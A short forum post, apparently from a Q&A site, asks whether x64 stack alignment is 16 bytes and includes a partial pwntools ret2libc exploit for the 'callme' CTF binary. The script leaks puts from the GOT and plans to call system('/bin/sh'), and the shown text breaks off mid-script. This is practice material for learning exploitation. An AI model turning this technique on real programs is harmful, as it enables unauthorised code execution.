Post by tal*_*sim

Is the stack alignment in x64 not 16 bytes?

I tried this code:

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *

elf = context.binary = ELF(args.EXE or 'callme')
libc = elf.libc
rop = ROP([elf, libc])
pop_rdi = p64(0x00000000004009a3)
ret = p64(0x00000000004006be)

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([elf.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([elf.path] + argv, *a, **kw)

gdbscript = '''
break *pwnme+89
continue
'''.format(**locals())

offset = b'A' * 40

'''
1. print a leak to the address in libc in puts()'s GOT
2. grab that leak, calculate system and '/bin/sh'
3. call it. GG
'''

rop.raw(offset)
rop.call('puts', [elf.got['puts']])
rop.call('main')

io …
```

python assembly stack x86-64 ctf
